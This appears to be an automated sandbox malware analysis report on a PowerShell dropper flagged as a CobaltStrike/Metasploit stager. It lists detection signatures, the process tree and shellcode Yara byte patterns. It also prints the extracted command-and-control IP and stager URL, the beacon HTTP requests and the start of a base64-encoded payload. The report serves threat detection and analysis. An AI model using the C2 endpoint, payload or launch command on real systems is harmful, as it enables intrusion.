Create Interactive Tour

Windows Analysis Report
fabd6ab15a0540d197f1ceaa312308b8.ps1

Overview

General Information

Sample name:fabd6ab15a0540d197f1ceaa312308b8.ps1
Analysis ID:1602897
MD5:8e117177bf5213213a857e0772e0d879
SHA1:34cd43115fd3afc87867b7fafed5d22efd7209fd
SHA256:c22079f6740eb864daa646b8d6f6a6d038482db3830ec0dd47fa3b0893c9eb0c
Tags:156-253-250-62ps1user-JAMESWT_MHT
Infos:

Detection

CobaltStrike, Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
Yara detected Metasploit Payload
C2 URLs / IPs found in malware configuration
Found API chain indicative of debugger detection
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Powershell drops PE file
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • powershell.exe (PID: 4312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • tmpE651.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\tmpE651.exe" MD5: A7E64FEA00D97B963D90E53093D5E220)
      • WerFault.exe (PID: 6984 cmdline: C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{
  "C2Server": "http://.17.10.250:80/EkTY",
  "User Agent": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"
}
{
  "Headers": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n",
  "Type": "Metasploit Download",
  "URL": "http://3.17.10.250/EkTY"
}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
  • 0x5dd7:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
  • 0x5e43:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
SourceRuleDescriptionAuthorStrings
00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_CobaltStrike_3Yara detected CobaltStrikeJoe Security
      00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
      • 0x11:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
      00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
      • 0x7d:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
      Process Memory Space: powershell.exe PID: 4312INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x20b78:$b1: ::WriteAllBytes(
      • 0x25a0f8:$b1: ::WriteAllBytes(
      • 0x1a579:$b2: ::FromBase64String(
      • 0xebf7:$s1: -join
      • 0x162cc:$s1: -join
      • 0x46a68:$s1: -join
      • 0x46aa3:$s1: -join
      • 0x46b5d:$s1: -join
      • 0x46b8b:$s1: -join
      • 0x46d17:$s1: -join
      • 0x46d3a:$s1: -join
      • 0x46fed:$s1: -join
      • 0x4700e:$s1: -join
      • 0x47040:$s1: -join
      • 0x47088:$s1: -join
      • 0x470b5:$s1: -join
      • 0x470dc:$s1: -join
      • 0x47107:$s1: -join
      • 0x47123:$s1: -join
      • 0x4718c:$s1: -join
      • 0x47613:$s1: -join

      System Summary

      barindex
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", ProcessId: 4312, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1", ProcessId: 4312, ProcessName: powershell.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://3.17.10.250/EkTYAvira URL Cloud: Label: malware
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeAvira: detection malicious, Label: HEUR/AGEN.1345031
      Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"C2Server": "http://.17.10.250:80/EkTY", "User Agent": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n"}
      Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\r\n", "Type": "Metasploit Download", "URL": "http://3.17.10.250/EkTY"}
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeReversingLabs: Detection: 86%
      Source: fabd6ab15a0540d197f1ceaa312308b8.ps1ReversingLabs: Detection: 21%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeJoe Sandbox ML: detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

      Networking

      barindex
      Source: Malware configuration extractorURLs: http://.17.10.250:80/EkTY
      Source: Malware configuration extractorURLs: http://3.17.10.250/EkTY
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: global trafficHTTP traffic detected: GET /EkTY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: 3.17.10.250Connection: Keep-AliveCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /EkTY HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoHost: 3.17.10.250Connection: Keep-AliveCache-Control: no-cache
      Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmp, tmpE651.exe, 00000002.00000002.1877232038.00000000000D6000.00000004.00000020.00020000.00000000.sdmp, tmpE651.exe, 00000002.00000002.1877232038.00000000000CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.17.10.250/EkTY
      Source: tmpE651.exe, 00000002.00000002.1877232038.00000000000AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.17.10.250/EkTYs
      Source: powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
      Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1702047883.00000264213F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000000.00000002.1702047883.0000026422E32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1725475467.0000026439500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1702047883.0000026422F7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.000002643146D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1717782849.00000264315A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1702047883.00000264229D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

      System Summary

      barindex
      Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPEDMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
      Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPEDMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE651.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116
      Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000002.00000002.1877409449.00000000001D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER16A.tmp.dmp, type: DROPPEDMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: classification engineClassification label: mal100.troj.evad.winPS1@5/11@0/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_03
      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3848
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0futhai.pka.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: fabd6ab15a0540d197f1ceaa312308b8.ps1ReversingLabs: Detection: 21%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\fabd6ab15a0540d197f1ceaa312308b8.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe"
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3848 -s 1116
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpE651.exe "C:\Users\user\AppData\Local\Temp\tmpE651.exe" Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYJAA
      Source: tmpE651.exe.0.drStatic PE information: section name: .xdata
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7800BD pushad ; iretd 0_2_00007FFD9B7800C1
      Source: C:\Users\user\AppData\Local\Temp\tmpE651.exeCode function: 2_2_001D0128 push eax; ret 2_2_001D0364
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmpE651.exeJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
